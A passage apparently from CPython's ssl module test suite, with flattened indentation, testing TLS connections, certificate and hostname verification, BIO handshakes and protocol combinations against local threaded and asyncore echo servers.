with ctx.wrap_socket(socket.socket(socket.AF_INET),
server_hostname="dummy") as s:
s.connect(self.server_addr)
ctx.verify_mode = ssl.CERT_REQUIRED
# This should succeed because we specify the root cert
ctx.load_verify_locations(SIGNING_CA)
with ctx.wrap_socket(socket.socket(socket.AF_INET)) as s:
s.connect(self.server_addr)
cert = s.getpeercert()
self.assertTrue(cert)
def test_connect_with_context_fail(self):
# This should fail because we have no verification certs. Connection
# failure crashes ThreadedEchoServer, so run this in an independent
# test method.
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS)
ctx.verify_mode = ssl.CERT_REQUIRED
s = ctx.wrap_socket(socket.socket(socket.AF_INET))
self.addCleanup(s.close)
self.assertRaisesRegex(ssl.SSLError, "certificate verify failed",
s.connect, self.server_addr)
def test_connect_capath(self):
# Verify server certificates using the `capath` argument
# NOTE: the subject hashing algorithm has been changed between
# OpenSSL 0.9.8n and 1.0.0, as a result the capath directory must
# contain both versions of each certificate (same content, different
# filename) for this test to be portable across OpenSSL releases.
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS)
ctx.verify_mode = ssl.CERT_REQUIRED
ctx.load_verify_locations(capath=CAPATH)
with ctx.wrap_socket(socket.socket(socket.AF_INET)) as s:
s.connect(self.server_addr)
cert = s.getpeercert()
self.assertTrue(cert)
# Same with a bytes `capath` argument
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS)
ctx.verify_mode = ssl.CERT_REQUIRED
ctx.load_verify_locations(capath=BYTES_CAPATH)
with ctx.wrap_socket(socket.socket(socket.AF_INET)) as s:
s.connect(self.server_addr)
cert = s.getpeercert()
self.assertTrue(cert)
def test_connect_cadata(self):
with open(SIGNING_CA) as f:
pem = f.read()
der = ssl.PEM_cert_to_DER_cert(pem)
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS)
ctx.verify_mode = ssl.CERT_REQUIRED
ctx.load_verify_locations(cadata=pem)
with ctx.wrap_socket(socket.socket(socket.AF_INET)) as s:
s.connect(self.server_addr)
cert = s.getpeercert()
self.assertTrue(cert)
# same with DER
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS)
ctx.verify_mode = ssl.CERT_REQUIRED
ctx.load_verify_locations(cadata=der)
with ctx.wrap_socket(socket.socket(socket.AF_INET)) as s:
s.connect(self.server_addr)
cert = s.getpeercert()
self.assertTrue(cert)
@unittest.skipIf(os.name == "nt", "Can't use a socket as a file under Windows")
def test_makefile_close(self):
# Issue #5238: creating a file-like object with makefile() shouldn't
# delay closing the underlying "real socket" (here tested with its
# file descriptor, hence skipping the test under Windows).
ss = test_wrap_socket(socket.socket(socket.AF_INET))
ss.connect(self.server_addr)
fd = ss.fileno()
f = ss.makefile()
f.close()
# The fd is still open
os.read(fd, 0)
# Closing the SSL socket should close the fd too
ss.close()
gc.collect()
with self.assertRaises(OSError) as e:
os.read(fd, 0)
self.assertEqual(e.exception.errno, errno.EBADF)
def test_non_blocking_handshake(self):
s = socket.socket(socket.AF_INET)
s.connect(self.server_addr)
s.setblocking(False)
s = test_wrap_socket(s,
cert_reqs=ssl.CERT_NONE,
do_handshake_on_connect=False)
self.addCleanup(s.close)
count = 0
while True:
try:
count += 1
s.do_handshake()
break
except ssl.SSLWantReadError:
select.select([s], [], [])
except ssl.SSLWantWriteError:
select.select([], [s], [])
if support.verbose:
sys.stdout.write("\nNeeded %d calls to do_handshake() to establish session.\n" % count)
def test_get_server_certificate(self):
_test_get_server_certificate(self, *self.server_addr, cert=SIGNING_CA)
def test_get_server_certificate_fail(self):
# Connection failure crashes ThreadedEchoServer, so run this in an
# independent test method
_test_get_server_certificate_fail(self, *self.server_addr)
def test_ciphers(self):
with test_wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_NONE, ciphers="ALL") as s:
s.connect(self.server_addr)
with test_wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_NONE, ciphers="DEFAULT") as s:
s.connect(self.server_addr)
# Error checking can happen at instantiation or when connecting
with self.assertRaisesRegex(ssl.SSLError, "No cipher can be selected"):
with socket.socket(socket.AF_INET) as sock:
s = test_wrap_socket(sock,
cert_reqs=ssl.CERT_NONE, ciphers="^$:,;?*'dorothyx")
s.connect(self.server_addr)
def test_get_ca_certs_capath(self):
# capath certs are loaded on request
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.load_verify_locations(capath=CAPATH)
self.assertEqual(ctx.get_ca_certs(), [])
with ctx.wrap_socket(socket.socket(socket.AF_INET),
server_hostname='localhost') as s:
s.connect(self.server_addr)
cert = s.getpeercert()
self.assertTrue(cert)
self.assertEqual(len(ctx.get_ca_certs()), 1)
@needs_sni
def test_context_setget(self):
# Check that the context of a connected socket can be replaced.
ctx1 = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx1.load_verify_locations(capath=CAPATH)
ctx2 = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx2.load_verify_locations(capath=CAPATH)
s = socket.socket(socket.AF_INET)
with ctx1.wrap_socket(s, server_hostname='localhost') as ss:
ss.connect(self.server_addr)
self.assertIs(ss.context, ctx1)
self.assertIs(ss._sslobj.context, ctx1)
ss.context = ctx2
self.assertIs(ss.context, ctx2)
self.assertIs(ss._sslobj.context, ctx2)
def ssl_io_loop(self, sock, incoming, outgoing, func, *args, **kwargs):
# A simple IO loop. Call func(*args) depending on the error we get
# (WANT_READ or WANT_WRITE) move data between the socket and the BIOs.
timeout = kwargs.get('timeout', 10)
deadline = time.monotonic() + timeout
count = 0
while True:
if time.monotonic() > deadline:
self.fail("timeout")
errno = None
count += 1
try:
ret = func(*args)
except ssl.SSLError as e:
if e.errno not in (ssl.SSL_ERROR_WANT_READ,
ssl.SSL_ERROR_WANT_WRITE):
raise
errno = e.errno
# Get any data from the outgoing BIO irrespective of any error, and
# send it to the socket.
buf = outgoing.read()
sock.sendall(buf)
# If there's no error, we're done. For WANT_READ, we need to get
# data from the socket and put it in the incoming BIO.
if errno is None:
break
elif errno == ssl.SSL_ERROR_WANT_READ:
buf = sock.recv(32768)
if buf:
incoming.write(buf)
else:
incoming.write_eof()
if support.verbose:
sys.stdout.write("Needed %d calls to complete %s().\n"
% (count, func.__name__))
return ret
def test_bio_handshake(self):
sock = socket.socket(socket.AF_INET)
self.addCleanup(sock.close)
sock.connect(self.server_addr)
incoming = ssl.MemoryBIO()
outgoing = ssl.MemoryBIO()
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
self.assertTrue(ctx.check_hostname)
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
ctx.load_verify_locations(SIGNING_CA)
sslobj = ctx.wrap_bio(incoming, outgoing, False,
SIGNED_CERTFILE_HOSTNAME)
self.assertIs(sslobj._sslobj.owner, sslobj)
self.assertIsNone(sslobj.cipher())
self.assertIsNone(sslobj.version())
self.assertIsNotNone(sslobj.shared_ciphers())
self.assertRaises(ValueError, sslobj.getpeercert)
if 'tls-unique' in ssl.CHANNEL_BINDING_TYPES:
self.assertIsNone(sslobj.get_channel_binding('tls-unique'))
self.ssl_io_loop(sock, incoming, outgoing, sslobj.do_handshake)
self.assertTrue(sslobj.cipher())
self.assertIsNotNone(sslobj.shared_ciphers())
self.assertIsNotNone(sslobj.version())
self.assertTrue(sslobj.getpeercert())
if 'tls-unique' in ssl.CHANNEL_BINDING_TYPES:
self.assertTrue(sslobj.get_channel_binding('tls-unique'))
try:
self.ssl_io_loop(sock, incoming, outgoing, sslobj.unwrap)
except ssl.SSLSyscallError:
# If the server shuts down the TCP connection without sending a
# secure shutdown message, this is reported as SSL_ERROR_SYSCALL
pass
self.assertRaises(ssl.SSLError, sslobj.write, b'foo')
def test_bio_read_write_data(self):
sock = socket.socket(socket.AF_INET)
self.addCleanup(sock.close)
sock.connect(self.server_addr)
incoming = ssl.MemoryBIO()
outgoing = ssl.MemoryBIO()
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS)
ctx.verify_mode = ssl.CERT_NONE
sslobj = ctx.wrap_bio(incoming, outgoing, False)
self.ssl_io_loop(sock, incoming, outgoing, sslobj.do_handshake)
req = b'FOO\n'
self.ssl_io_loop(sock, incoming, outgoing, sslobj.write, req)
buf = self.ssl_io_loop(sock, incoming, outgoing, sslobj.read, 1024)
self.assertEqual(buf, b'foo\n')
self.ssl_io_loop(sock, incoming, outgoing, sslobj.unwrap)
class NetworkedTests(unittest.TestCase):
def test_timeout_connect_ex(self):
# Issue #12065: on a timeout, connect_ex() should return the original
# errno (mimicking the behaviour of non-SSL sockets).
with support.transient_internet(REMOTE_HOST):
s = test_wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED,
do_handshake_on_connect=False)
self.addCleanup(s.close)
s.settimeout(0.0000001)
rc = s.connect_ex((REMOTE_HOST, 443))
if rc == 0:
self.skipTest("REMOTE_HOST responded too quickly")
self.assertIn(rc, (errno.EAGAIN, errno.EWOULDBLOCK))
@unittest.skipUnless(support.IPV6_ENABLED, 'Needs IPv6')
def test_get_server_certificate_ipv6(self):
with support.transient_internet('ipv6.google.com'):
_test_get_server_certificate(self, 'ipv6.google.com', 443)
_test_get_server_certificate_fail(self, 'ipv6.google.com', 443)
def _test_get_server_certificate(test, host, port, cert=None):
pem = ssl.get_server_certificate((host, port))
if not pem:
test.fail("No server certificate on %s:%s!" % (host, port))
pem = ssl.get_server_certificate((host, port), ca_certs=cert)
if not pem:
test.fail("No server certificate on %s:%s!" % (host, port))
if support.verbose:
sys.stdout.write("\nVerified certificate for %s:%s is\n%s\n" % (host, port ,pem))
def _test_get_server_certificate_fail(test, host, port):
try:
pem = ssl.get_server_certificate((host, port), ca_certs=CERTFILE)
except ssl.SSLError as x:
#should fail
if support.verbose:
sys.stdout.write("%s\n" % x)
else:
test.fail("Got server certificate %s for %s:%s!" % (pem, host, port))
from test.ssl_servers import make_https_server
class ThreadedEchoServer(threading.Thread):
class ConnectionHandler(threading.Thread):
"""A mildly complicated class, because we want it to work both
with and without the SSL wrapper around the socket connection, so
that we can test the STARTTLS functionality."""
def __init__(self, server, connsock, addr):
self.server = server
self.running = False
self.sock = connsock
self.addr = addr
self.sock.setblocking(1)
self.sslconn = None
threading.Thread.__init__(self)
self.daemon = True
def wrap_conn(self):
try:
self.sslconn = self.server.context.wrap_socket(
self.sock, server_side=True)
self.server.selected_npn_protocols.append(self.sslconn.selected_npn_protocol())
self.server.selected_alpn_protocols.append(self.sslconn.selected_alpn_protocol())
except (ConnectionResetError, BrokenPipeError, ConnectionAbortedError) as e:
# We treat ConnectionResetError as though it were an
# SSLError - OpenSSL on Ubuntu abruptly closes the
# connection when asked to use an unsupported protocol.
#
# BrokenPipeError is raised in TLS 1.3 mode, when OpenSSL
# tries to send session tickets after handshake.
# https://github.com/openssl/openssl/issues/6342
#
# ConnectionAbortedError is raised in TLS 1.3 mode, when OpenSSL
# tries to send session tickets after handshake when using WinSock.
self.server.conn_errors.append(str(e))
if self.server.chatty:
handle_error("\n server: bad connection attempt from " + repr(self.addr) + ":\n")
self.running = False
self.close()
return False
except (ssl.SSLError, OSError) as e:
# OSError may occur with wrong protocols, e.g. both
# sides use PROTOCOL_TLS_SERVER.
#
# XXX Various errors can have happened here, for example
# a mismatching protocol version, an invalid certificate,
# or a low-level bug. This should be made more discriminating.
#
# bpo-31323: Store the exception as string to prevent
# a reference leak: server -> conn_errors -> exception
# -> traceback -> self (ConnectionHandler) -> server
self.server.conn_errors.append(str(e))
if self.server.chatty:
handle_error("\n server: bad connection attempt from " + repr(self.addr) + ":\n")
self.running = False
self.server.stop()
self.close()
return False
else:
self.server.shared_ciphers.append(self.sslconn.shared_ciphers())
if self.server.context.verify_mode == ssl.CERT_REQUIRED:
cert = self.sslconn.getpeercert()
if support.verbose and self.server.chatty:
sys.stdout.write(" client cert is " + pprint.pformat(cert) + "\n")
cert_binary = self.sslconn.getpeercert(True)
if support.verbose and self.server.chatty:
sys.stdout.write(" cert binary is " + str(len(cert_binary)) + " bytes\n")
cipher = self.sslconn.cipher()
if support.verbose and self.server.chatty:
sys.stdout.write(" server: connection cipher is now " + str(cipher) + "\n")
sys.stdout.write(" server: selected protocol is now "
+ str(self.sslconn.selected_npn_protocol()) + "\n")
return True
def read(self):
if self.sslconn:
return self.sslconn.read()
else:
return self.sock.recv(1024)
def write(self, bytes):
if self.sslconn:
return self.sslconn.write(bytes)
else:
return self.sock.send(bytes)
def close(self):
if self.sslconn:
self.sslconn.close()
else:
self.sock.close()
def run(self):
self.running = True
if not self.server.starttls_server:
if not self.wrap_conn():
return
while self.running:
try:
msg = self.read()
stripped = msg.strip()
if not stripped:
# eof, so quit this handler
self.running = False
try:
self.sock = self.sslconn.unwrap()
except OSError:
# Many tests shut the TCP connection down
# without an SSL shutdown. This causes
# unwrap() to raise OSError with errno=0!
pass
else:
self.sslconn = None
self.close()
elif stripped == b'over':
if support.verbose and self.server.connectionchatty:
sys.stdout.write(" server: client closed connection\n")
self.close()
return
elif (self.server.starttls_server and
stripped == b'STARTTLS'):
if support.verbose and self.server.connectionchatty:
sys.stdout.write(" server: read STARTTLS from client, sending OK...\n")
self.write(b"OK\n")
if not self.wrap_conn():
return
elif (self.server.starttls_server and self.sslconn
and stripped == b'ENDTLS'):
if support.verbose and self.server.connectionchatty:
sys.stdout.write(" server: read ENDTLS from client, sending OK...\n")
self.write(b"OK\n")
self.sock = self.sslconn.unwrap()
self.sslconn = None
if support.verbose and self.server.connectionchatty:
sys.stdout.write(" server: connection is now unencrypted...\n")
elif stripped == b'CB tls-unique':
if support.verbose and self.server.connectionchatty:
sys.stdout.write(" server: read CB tls-unique from client, sending our CB data...\n")
data = self.sslconn.get_channel_binding("tls-unique")
self.write(repr(data).encode("us-ascii") + b"\n")
elif stripped == b'PHA':
if support.verbose and self.server.connectionchatty:
sys.stdout.write(" server: initiating post handshake auth\n")
try:
self.sslconn.verify_client_post_handshake()
except ssl.SSLError as e:
self.write(repr(e).encode("us-ascii") + b"\n")
else:
self.write(b"OK\n")
elif stripped == b'HASCERT':
if self.sslconn.getpeercert() is not None:
self.write(b'TRUE\n')
else:
self.write(b'FALSE\n')
elif stripped == b'GETCERT':
cert = self.sslconn.getpeercert()
self.write(repr(cert).encode("us-ascii") + b"\n")
else:
if (support.verbose and
self.server.connectionchatty):
ctype = (self.sslconn and "encrypted") or "unencrypted"
sys.stdout.write(" server: read %r (%s), sending back %r (%s)...\n"
% (msg, ctype, msg.lower(), ctype))
self.write(msg.lower())
except (ConnectionResetError, ConnectionAbortedError):
# XXX: OpenSSL 1.1.1 sometimes raises ConnectionResetError
# when connection is not shut down gracefully.
if self.server.chatty and support.verbose:
sys.stdout.write(
" Connection reset by peer: {}\n".format(
self.addr)
)
self.close()
self.running = False
except ssl.SSLError as err:
# On Windows sometimes test_pha_required_nocert receives the
# PEER_DID_NOT_RETURN_A_CERTIFICATE exception
# before the 'tlsv13 alert certificate required' exception.
# If the server is stopped when PEER_DID_NOT_RETURN_A_CERTIFICATE
# is received test_pha_required_nocert fails with ConnectionResetError
# because the underlying socket is closed
if 'PEER_DID_NOT_RETURN_A_CERTIFICATE' == err.reason:
if self.server.chatty and support.verbose:
sys.stdout.write(err.args[1])
# test_pha_required_nocert is expecting this exception
raise ssl.SSLError('tlsv13 alert certificate required')
except OSError:
if self.server.chatty:
handle_error("Test server failure:\n")
self.close()
self.running = False
# normally, we'd just stop here, but for the test
# harness, we want to stop the server
self.server.stop()
def __init__(self, certificate=None, ssl_version=None,
certreqs=None, cacerts=None,
chatty=True, connectionchatty=False, starttls_server=False,
npn_protocols=None, alpn_protocols=None,
ciphers=None, context=None):
if context:
self.context = context
else:
self.context = ssl.SSLContext(ssl_version
if ssl_version is not None
else ssl.PROTOCOL_TLS_SERVER)
self.context.verify_mode = (certreqs if certreqs is not None
else ssl.CERT_NONE)
if cacerts:
self.context.load_verify_locations(cacerts)
if certificate:
self.context.load_cert_chain(certificate)
if npn_protocols:
self.context.set_npn_protocols(npn_protocols)
if alpn_protocols:
self.context.set_alpn_protocols(alpn_protocols)
if ciphers:
self.context.set_ciphers(ciphers)
self.chatty = chatty
self.connectionchatty = connectionchatty
self.starttls_server = starttls_server
self.sock = socket.socket()
self.port = support.bind_port(self.sock)
self.flag = None
self.active = False
self.selected_npn_protocols = []
self.selected_alpn_protocols = []
self.shared_ciphers = []
self.conn_errors = []
threading.Thread.__init__(self)
self.daemon = True
def __enter__(self):
self.start(threading.Event())
self.flag.wait()
return self
def __exit__(self, *args):
self.stop()
self.join()
def start(self, flag=None):
self.flag = flag
threading.Thread.start(self)
def run(self):
self.sock.settimeout(0.05)
self.sock.listen()
self.active = True
if self.flag:
# signal an event
self.flag.set()
while self.active:
try:
newconn, connaddr = self.sock.accept()
if support.verbose and self.chatty:
sys.stdout.write(' server: new connection from '
+ repr(connaddr) + '\n')
handler = self.ConnectionHandler(self, newconn, connaddr)
handler.start()
handler.join()
except socket.timeout:
pass
except KeyboardInterrupt:
self.stop()
except BaseException as e:
if support.verbose and self.chatty:
sys.stdout.write(
' connection handling failed: ' + repr(e) + '\n')
self.sock.close()
def stop(self):
self.active = False
class AsyncoreEchoServer(threading.Thread):
# this one's based on asyncore.dispatcher
class EchoServer (asyncore.dispatcher):
class ConnectionHandler(asyncore.dispatcher_with_send):
def __init__(self, conn, certfile):
self.socket = test_wrap_socket(conn, server_side=True,
certfile=certfile,
do_handshake_on_connect=False)
asyncore.dispatcher_with_send.__init__(self, self.socket)
self._ssl_accepting = True
self._do_ssl_handshake()
def readable(self):
if isinstance(self.socket, ssl.SSLSocket):
while self.socket.pending() > 0:
self.handle_read_event()
return True
def _do_ssl_handshake(self):
try:
self.socket.do_handshake()
except (ssl.SSLWantReadError, ssl.SSLWantWriteError):
return
except ssl.SSLEOFError:
return self.handle_close()
except ssl.SSLError:
raise
except OSError as err:
if err.args[0] == errno.ECONNABORTED:
return self.handle_close()
else:
self._ssl_accepting = False
def handle_read(self):
if self._ssl_accepting:
self._do_ssl_handshake()
else:
data = self.recv(1024)
if support.verbose:
sys.stdout.write(" server: read %s from client\n" % repr(data))
if not data:
self.close()
else:
self.send(data.lower())
def handle_close(self):
self.close()
if support.verbose:
sys.stdout.write(" server: closed connection %s\n" % self.socket)
def handle_error(self):
raise
def __init__(self, certfile):
self.certfile = certfile
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.port = support.bind_port(sock, '')
asyncore.dispatcher.__init__(self, sock)
self.listen(5)
def handle_accepted(self, sock_obj, addr):
if support.verbose:
sys.stdout.write(" server: new connection from %s:%s\n" %addr)
self.ConnectionHandler(sock_obj, self.certfile)
def handle_error(self):
raise
def __init__(self, certfile):
self.flag = None
self.active = False
self.server = self.EchoServer(certfile)
self.port = self.server.port
threading.Thread.__init__(self)
self.daemon = True
def __str__(self):
return "<%s %s>" % (self.__class__.__name__, self.server)
def __enter__(self):
self.start(threading.Event())
self.flag.wait()
return self
def __exit__(self, *args):
if support.verbose:
sys.stdout.write(" cleanup: stopping server.\n")
self.stop()
if support.verbose:
sys.stdout.write(" cleanup: joining server thread.\n")
self.join()
if support.verbose:
sys.stdout.write(" cleanup: successfully joined.\n")
# make sure that ConnectionHandler is removed from socket_map
asyncore.close_all(ignore_all=True)
def start (self, flag=None):
self.flag = flag
threading.Thread.start(self)
def run(self):
self.active = True
if self.flag:
self.flag.set()
while self.active:
try:
asyncore.loop(1)
except:
pass
def stop(self):
self.active = False
self.server.close()
def server_params_test(client_context, server_context, indata=b"FOO\n",
chatty=True, connectionchatty=False, sni_name=None,
session=None):
"""
Launch a server, connect a client to it and try various reads
and writes.
"""
stats = {}
server = ThreadedEchoServer(context=server_context,
chatty=chatty,
connectionchatty=False)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=sni_name, session=session) as s:
s.connect((HOST, server.port))
for arg in [indata, bytearray(indata), memoryview(indata)]:
if connectionchatty:
if support.verbose:
sys.stdout.write(
" client: sending %r...\n" % indata)
s.write(arg)
outdata = s.read()
if connectionchatty:
if support.verbose:
sys.stdout.write(" client: read %r\n" % outdata)
if outdata != indata.lower():
raise AssertionError(
"bad data <<%r>> (%d) received; expected <<%r>> (%d)\n"
% (outdata[:20], len(outdata),
indata[:20].lower(), len(indata)))
s.write(b"over\n")
if connectionchatty:
if support.verbose:
sys.stdout.write(" client: closing connection.\n")
stats.update({
'compression': s.compression(),
'cipher': s.cipher(),
'peercert': s.getpeercert(),
'client_alpn_protocol': s.selected_alpn_protocol(),
'client_npn_protocol': s.selected_npn_protocol(),
'version': s.version(),
'session_reused': s.session_reused,
'session': s.session,
})
s.close()
stats['server_alpn_protocols'] = server.selected_alpn_protocols
stats['server_npn_protocols'] = server.selected_npn_protocols
stats['server_shared_ciphers'] = server.shared_ciphers
return stats
def try_protocol_combo(server_protocol, client_protocol, expect_success,
certsreqs=None, server_options=0, client_options=0):
"""
Try to SSL-connect using *client_protocol* to *server_protocol*.
If *expect_success* is true, assert that the connection succeeds,
if it's false, assert that the connection fails.
Also, if *expect_success* is a string, assert that it is the protocol
version actually used by the connection.
"""
if certsreqs is None:
certsreqs = ssl.CERT_NONE
certtype = {
ssl.CERT_NONE: "CERT_NONE",
ssl.CERT_OPTIONAL: "CERT_OPTIONAL",
ssl.CERT_REQUIRED: "CERT_REQUIRED",
}[certsreqs]
if support.verbose:
formatstr = (expect_success and " %s->%s %s\n") or " {%s->%s} %s\n"
sys.stdout.write(formatstr %
(ssl.get_protocol_name(client_protocol),
ssl.get_protocol_name(server_protocol),
certtype))
client_context = ssl.SSLContext(client_protocol)
client_context.options |= client_options
server_context = ssl.SSLContext(server_protocol)
server_context.options |= server_options
min_version = PROTOCOL_TO_TLS_VERSION.get(client_protocol, None)
if (min_version is not None
# SSLContext.minimum_version is only available on recent OpenSSL
# (setter added in OpenSSL 1.1.0, getter added in OpenSSL 1.1.1)
and hasattr(server_context, 'minimum_version')
and server_protocol == ssl.PROTOCOL_TLS
and server_context.minimum_version > min_version):
# If OpenSSL configuration is strict and requires more recent TLS
# version, we have to change the minimum to test old TLS versions.
server_context.minimum_version = min_version
# NOTE: we must enable "ALL" ciphers on the client, otherwise an
# SSLv23 client will send an SSLv3 hello (rather than SSLv2)
# starting from OpenSSL 1.0.0 (see issue #8322).
if client_context.protocol == ssl.PROTOCOL_TLS:
client_context.set_ciphers("ALL")
for ctx in (client_context, server_context):
ctx.verify_mode = certsreqs
ctx.load_cert_chain(SIGNED_CERTFILE)
ctx.load_verify_locations(SIGNING_CA)
try:
stats = server_params_test(client_context, server_context,
chatty=False, connectionchatty=False)
# Protocol mismatch can result in either an SSLError, or a
# "Connection reset by peer" error.
except ssl.SSLError:
if expect_success:
raise
except OSError as e:
if expect_success or e.errno != errno.ECONNRESET:
raise
else:
if not expect_success:
raise AssertionError(
"Client protocol %s succeeded with server protocol %s!"
% (ssl.get_protocol_name(client_protocol),
ssl.get_protocol_name(server_protocol)))
elif (expect_success is not True
and expect_success != stats['version']):
raise AssertionError("version mismatch: expected %r, got %r"
% (expect_success, stats['version']))
class ThreadedTests(unittest.TestCase):
def test_echo(self):
"""Basic test of an SSL client connecting to a server"""
if support.verbose:
sys.stdout.write("\n")
for protocol in PROTOCOLS:
if protocol in {ssl.PROTOCOL_TLS_CLIENT, ssl.PROTOCOL_TLS_SERVER}:
continue
with self.subTest(protocol=ssl._PROTOCOL_NAMES[protocol]):
context = ssl.SSLContext(protocol)
context.load_cert_chain(CERTFILE)
server_params_test(context, context,
chatty=True, connectionchatty=True)
client_context, server_context, hostname = testing_context()
with self.subTest(client=ssl.PROTOCOL_TLS_CLIENT, server=ssl.PROTOCOL_TLS_SERVER):
server_params_test(client_context=client_context,
server_context=server_context,
chatty=True, connectionchatty=True,
sni_name=hostname)
client_context.check_hostname = False
with self.subTest(client=ssl.PROTOCOL_TLS_SERVER, server=ssl.PROTOCOL_TLS_CLIENT):
with self.assertRaises(ssl.SSLError) as e:
server_params_test(client_context=server_context,
server_context=client_context,
chatty=True, connectionchatty=True,
sni_name=hostname)
self.assertIn('called a function you should not call',
str(e.exception))
with self.subTest(client=ssl.PROTOCOL_TLS_SERVER, server=ssl.PROTOCOL_TLS_SERVER):
with self.assertRaises(ssl.SSLError) as e:
server_params_test(client_context=server_context,
server_context=server_context,
chatty=True, connectionchatty=True)
self.assertIn('called a function you should not call',
str(e.exception))
with self.subTest(client=ssl.PROTOCOL_TLS_CLIENT, server=ssl.PROTOCOL_TLS_CLIENT):
with self.assertRaises(ssl.SSLError) as e:
server_params_test(client_context=server_context,
server_context=client_context,
chatty=True, connectionchatty=True)
self.assertIn('called a function you should not call',
str(e.exception))
def test_getpeercert(self):
if support.verbose:
sys.stdout.write("\n")
client_context, server_context, hostname = testing_context()
server = ThreadedEchoServer(context=server_context, chatty=False)
with server:
with client_context.wrap_socket(socket.socket(),
do_handshake_on_connect=False,
server_hostname=hostname) as s:
s.connect((HOST, server.port))
# getpeercert() raise ValueError while the handshake isn't
# done.
with self.assertRaises(ValueError):
s.getpeercert()
s.do_handshake()
cert = s.getpeercert()
self.assertTrue(cert, "Can't get peer certificate.")
cipher = s.cipher()
if support.verbose:
sys.stdout.write(pprint.pformat(cert) + '\n')
sys.stdout.write("Connection cipher is " + str(cipher) + '.\n')
if 'subject' not in cert:
self.fail("No subject field in certificate: %s." %
pprint.pformat(cert))
if ((('organizationName', 'Python Software Foundation'),)
not in cert['subject']):
self.fail(
"Missing or invalid 'organizationName' field in certificate subject; "
"should be 'Python Software Foundation'.")
self.assertIn('notBefore', cert)
self.assertIn('notAfter', cert)
before = ssl.cert_time_to_seconds(cert['notBefore'])
after = ssl.cert_time_to_seconds(cert['notAfter'])
self.assertLess(before, after)
@unittest.skipUnless(have_verify_flags(),
"verify_flags need OpenSSL > 0.9.8")
def test_crl_check(self):
if support.verbose:
sys.stdout.write("\n")
client_context, server_context, hostname = testing_context()
tf = getattr(ssl, "VERIFY_X509_TRUSTED_FIRST", 0)
self.assertEqual(client_context.verify_flags, ssl.VERIFY_DEFAULT | tf)
# VERIFY_DEFAULT should pass
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
cert = s.getpeercert()
self.assertTrue(cert, "Can't get peer certificate.")
# VERIFY_CRL_CHECK_LEAF without a loaded CRL file fails
client_context.verify_flags |= ssl.VERIFY_CRL_CHECK_LEAF
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
with self.assertRaisesRegex(ssl.SSLError,
"certificate verify failed"):
s.connect((HOST, server.port))
# now load a CRL file. The CRL file is signed by the CA.
client_context.load_verify_locations(CRLFILE)
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
cert = s.getpeercert()
self.assertTrue(cert, "Can't get peer certificate.")
def test_check_hostname(self):
if support.verbose:
sys.stdout.write("\n")
client_context, server_context, hostname = testing_context()
# correct hostname should verify
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
cert = s.getpeercert()
self.assertTrue(cert, "Can't get peer certificate.")
# incorrect hostname should raise an exception
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname="invalid") as s:
with self.assertRaisesRegex(
ssl.CertificateError,
"Hostname mismatch, certificate is not valid for 'invalid'."):
s.connect((HOST, server.port))
# missing server_hostname arg should cause an exception, too
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with socket.socket() as s:
with self.assertRaisesRegex(ValueError,
"check_hostname requires server_hostname"):
client_context.wrap_socket(s)
def test_ecc_cert(self):
client_context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
client_context.load_verify_locations(SIGNING_CA)
client_context.set_ciphers('ECDHE:ECDSA:!NULL:!aRSA')
hostname = SIGNED_CERTFILE_ECC_HOSTNAME
server_context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
# load ECC cert
server_context.load_cert_chain(SIGNED_CERTFILE_ECC)
# correct hostname should verify
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
cert = s.getpeercert()
self.assertTrue(cert, "Can't get peer certificate.")
cipher = s.cipher()[0].split('-')
self.assertTrue(cipher[:2], ('ECDHE', 'ECDSA'))
def test_dual_rsa_ecc(self):
client_context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
client_context.load_verify_locations(SIGNING_CA)
# TODO: fix TLSv1.3 once SSLContext can restrict signature
# algorithms.
client_context.options |= ssl.OP_NO_TLSv1_3
# only ECDSA certs
client_context.set_ciphers('ECDHE:ECDSA:!NULL:!aRSA')
hostname = SIGNED_CERTFILE_ECC_HOSTNAME
server_context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
# load ECC and RSA key/cert pairs
server_context.load_cert_chain(SIGNED_CERTFILE_ECC)
server_context.load_cert_chain(SIGNED_CERTFILE)
# correct hostname should verify
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
cert = s.getpeercert()
self.assertTrue(cert, "Can't get peer certificate.")
cipher = s.cipher()[0].split('-')
self.assertTrue(cipher[:2], ('ECDHE', 'ECDSA'))
def test_check_hostname_idn(self):
if support.verbose:
sys.stdout.write("\n")
server_context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
